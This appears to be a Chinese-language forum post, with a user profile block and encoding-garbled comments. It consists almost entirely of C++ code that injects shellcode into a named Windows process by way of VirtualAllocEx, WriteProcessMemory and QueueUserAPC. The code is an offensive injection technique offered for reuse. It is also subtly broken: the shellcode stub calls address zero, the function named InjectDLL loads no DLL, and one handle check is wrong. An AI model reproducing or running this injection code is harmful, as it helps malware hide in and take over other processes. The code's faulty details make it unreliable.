終身高級VIP會員
  
- 資源幣
- 43
- 積分
- 103
- 貢獻
- 0
- 在線時間
- 30 小時
- 注冊時間
- 2019-3-29
- 最后登錄
- 2024-4-2
|
#include <windows.h>
#include <iostream>
#include <vector>
#include <memory>
// 函數(shù)聲明
DWORD GetProcessID(const wchar_t* szProcessName);
BOOL InjectDLL(DWORD dwPid);
int main()
{
DWORD dwPid = GetProcessID(L"target_process.exe");
if (dwPid == 0xFFFFFFFF)
{
std::cout << "GetProcessID failed." << std::endl;
return 1;
}
if (!InjectDLL(dwPid))
{
std::cout << "InjectDLL failed." << std::endl;
return 1;
}
std::cout << "InjectDLL success." << std::endl;
return 0;
}
DWORD GetProcessID(const wchar_t* szProcessName)
{
// 創(chuàng)建快照
std::unique_ptr<void, decltype(&CloseHandle)> hSnap(CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL), &CloseHandle);
if (hSnap == nullptr)
{
std::cout << "CreateToolhelp32Snapshot failed." << std::endl;
return 0xFFFFFFFF;
}
// 遍歷進程列表,查找指定名稱進程
PROCESSENTRY32W pe = { sizeof(pe) };
for (BOOL bRet = Process32FirstW(hSnap.get(), &pe); bRet; bRet = Process32NextW(hSnap.get(), &pe))
{
if (wcscmp(szProcessName, pe.szExeFile) == 0)
return pe.th32ProcessID;
}
return 0xFFFFFFFF;
}
BOOL InjectDLL(DWORD dwPid)
{
std::vector<BYTE> Shellcode = { 0x48, 0x83, 0xEC, 0x28, 0x48, 0x8B, 0xC1, 0x48, 0x8D, 0x54, 0x24, 0x20, 0x48, 0x8B, 0x49, 0x18, 0xB8,
0x00, 0x00, 0x00, 0x00, 0xFF, 0xD0, 0x48, 0x83, 0xC4, 0x28, 0xC3 };
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
if (hProcess == NULL)
{
std::cout << "OpenProcess failed." << std::endl;
return FALSE;
}
SIZE_T nShellcodeSize = Shellcode.size();
// 在目標進程分配一塊內(nèi)存��,放Shellcode
LPVOID pRemoteShellcode = VirtualAllocEx(hProcess, NULL, nShellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pRemoteShellcode == NULL)
{
std::cout << "VirtualAllocEx failed." << std::endl;
return FALSE;
}
// 將Shellcode寫入目標進程空間中
if (!WriteProcessMemory(hProcess, pRemoteShellcode, Shellcode.data(), nShellcodeSize, NULL))
{
std::cout << "WriteProcessMemory failed." << std::endl;
return FALSE;
}
// 找到目標線程
HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
DWORD dwThreadId = 0;
THREADENTRY32 te;
for (BOOL ret = Thread32First(hSnap, &te); ret; ret = Thread32Next(hSnap, &te))
{
if (te.th32OwnerProcessID == dwPid)
{
dwThreadId = te.th32ThreadID;
break;
}
}
CloseHandle(hSnap);
// 指定目標線程��,執(zhí)行Shellcode
HANDLE hThread = OpenThread(THREAD_SET_CONTEXT, FALSE, dwThreadId);
DWORD dwRet = QueueUserAPC((PAPCFUNC)pRemoteShellcode, hThread, NULL);
if (dwRet == 0)
{
std::cout << "QueueUserAPC failed." << std::endl;
return FALSE;
}
// 等待遠程線程結(jié)束
WaitForSingleObject(hThread, INFINITE);
return TRUE;
} |
|
[復(fù)制鏈接]
發(fā)表于 2023-4-13 18:14:11